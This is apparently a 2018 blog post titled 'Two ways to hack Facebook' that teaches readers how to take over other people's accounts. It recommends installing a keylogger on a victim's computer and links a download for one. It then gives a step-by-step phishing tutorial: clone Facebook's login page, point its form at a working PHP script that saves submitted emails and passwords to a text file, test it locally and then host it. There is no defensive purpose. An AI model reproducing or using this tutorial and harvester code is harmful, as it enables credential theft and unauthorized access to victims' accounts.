Thursday, December 20, 2018

Two ways to hack Facebook

Method One: Keylogger

One of the easiest ways to obtain a password is to install the Keylogger on the victim computer if you happened to have physical access to it. Keylogger is a program that records each keystroke on the keyboard that the user types, most often without their knowledge. The software has to be manually installed on the victim's computer. Once installed it will automatically start capturing keystroke on the computer and will remain undetected. There is a free keylogger that you can download for free that will record keystroke and send it to you via email. 

Click here to download a free keylogger.
The password to unzip the file is 123

Method Two: Phishing

This attack method can be difficult because you will have to first create a fake web page that looks exactly like Facebook and second you will have to perform a social engineer in order to trick the victim into visiting your fake Facebook page and entering the username and password. To create a fake Facebook login page follow the tutorial below.

1. Go to Facebook.com. At the login page right-click anywhere and select View page source.




2. Once the View page source is opened. Press Ctrl + A to highlight all of the code. Now press Ctrl + C to copy all of the code on the page.

3. Open a notepad and paste the code into the notepad.

4. Now inside the notepad press Ctrl + F to open the find tool.


5. In the find window, type in action= and press Enter. The find tool will look for the first action=. This is where we will need to make some changes to the code in order to record the victim's password once they typed it in and press Enter.


action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=110"

method="post"

6. Once you found the code like the one displayed above, erase the code and change it to the code below. 


action="log.php"
method="GET"

7. Now save this as index.php and open a new notepad. When you click on File Save As make sure you select Save types as All file before you give the file the name index.php

8. Copy and paste the code below to the new the notepad that you just opened and save it as log.php

<?php
header("Location: http://www.facebook.com/home.php? ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}

9. Now we need to test to see if this is working before we upload the two php files to a web server. If you are doing this on a Windows machine I recommend downloading XAMPP and install it. This will allow you to turn your Windows machine into a web server to run PHP. 

If you are doing this on a Linux machine just make sure you install Apache, PHP and MySQL and upload the two PHP files to the www directory.

10. Since I am doing this on my Windows machine I will show you where to put the two PHP files so you can test to see if your phishing page is working. After you have installed the XAMPP copy the two PHP files to the C:\xampp\htdocs directory. Now open the XAMPP control panel and start the XAMPP server 


11. Now open your favorite browser, in the address bar type in localhost and press Enter. You should now be able to see the fake Facebook page you created like the one I have below. Notice we can tell it is fake because in the address bar it says localhost instead of facebook.com. And if this were to be on a web server it would have a domain name different from facebook.com

In the email box type in an email and in the password type in any password and click Login.


12. Once you clicked the Login go back into the C:\xampp\htdocs directory and should now see a text file called passwords.txt. Open this file and you should be able to see the email and password you entered.

3 comments: